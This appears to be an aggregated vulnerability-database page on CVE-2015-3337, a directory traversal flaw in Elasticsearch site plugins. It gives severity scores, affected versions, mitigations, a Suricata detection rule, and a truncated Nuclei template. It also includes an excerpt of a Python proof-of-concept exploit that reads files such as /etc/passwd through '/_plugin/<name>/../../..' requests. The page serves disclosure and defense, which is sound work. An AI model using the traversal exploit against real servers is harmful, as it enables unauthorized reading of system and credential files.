CVE-2015-3337
Published 2015-05-01
Priority P3 · 46 · medium · CVSS 2.0: 4.3
AV:N/AC:M/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 33.13% (98.2th percentile)
Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| elasticsearch | elasticsearch | <= 1.4.4 | — |
| elasticsearch | elasticsearch | — | — |
| elasticsearch | elasticsearch | — | — |
Detection & IOCs
- Non-site plugins (Shield, Licensing, Cloud-AWS, Cloud-GCE, Cloud-Azure, analysis plugins, river plugins) do not expose the vulnerability
- Setting http.disable_sites=true in elasticsearch.yml mitigates the traversal but disables all site plugin functionality
CVSS provenance
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:P/I:N/A:N
vendor_redhat · 4.3 MEDIUM
OSV
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
osv·2022-05-17
CVE-2015-3337 [MEDIUM] Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
GHSA
Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
ghsa·2022-05-17
CVE-2015-3337 [MEDIUM] CWE-22 Improper Limitation of a Pathname to a Restricted Directory in Elasticsearch
Red Hat
elasticsearch: directory traversal flaw
vendor_redhat·2015-04-24·CVSS 4.3
CVE-2015-3337 [MEDIUM] CWE-22 elasticsearch: directory traversal flaw
Statement: This issue affects the versions of elasticsearch as shipped with Red Hat Satellite 6.x and Subscription Asset Manager 1.x. Red Hat Product Security has rated this issue as having Low security impact. A future update may address this issue. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
Mitigation: Users that do not want to upgrade can address the vulnerability in several ways, but these options will break any site plugin:
* Set http.disable_sites to true in the ela
Suricata
ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)
suricata·2015-05-22·CVSS 4.3
CVE-2015-3337 [MEDIUM] ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER ElasticSearch Directory Traversal Attempt (CVE-2015-3337)"; flow:established,to_server; http.uri.raw; content:"/_plugin/"; fast_pattern; pcre:"/(?:%2(?:52e(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/))|e(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/)))|\.(?:%2(?:52e(?:%(?:(?:25)?2|c0%a)f|\/)|e(?:%(?:(?:25)?2|c0%a)f|\/))|\.(?:%(?:(?:25)?2|c0%a)f|\/)))/Ri"; reference:cve,2015-3337; classtype:web-application-attack; sid:2021138; rev:7; metadata:created_at 2015_05_22, cve CVE_2015_3337, deployment Perimeter, deployment Internal, confidence High, signature
Exploit-DB
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
exploitdb·2015-05-18·CVSS 4.3
CVE-2015-3337 [MEDIUM] ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal
ElasticSearch 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit()
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
def grab(plugin):
    socket.setdefaulttimeout(3)
    s = socket.socket()
    s.connect((host,port))
    s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
           "Host: %s\n\n" % (plugin, fpath, host))
    file = s.recv(2048)
    print " [*] Trying to retrieve %s:" % fpath
    if ("HTTP/1.0 200 OK" in file):
        print "\n%s" % file
    else:
        print "[-] File Not Found, No Access Rights or System Not Vulnerable"
def pfind(plugin):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
               "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
Nuclei
Elasticsearch - Local File Inclusion
nuclei·CVSS 4.3
CVE-2015-3337 [MEDIUM] Elasticsearch - Local File Inclusion
Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
Template:
id: CVE-2015-3337
info:
  name: Elasticsearch - Local File Inclusion
  author: pdteam
  severity: medium
  description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Upgrade to a patched version of Elasticsearch or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/37054/
    - https://www.elastic.co/community/security
    - http://www.debian.org/security/2015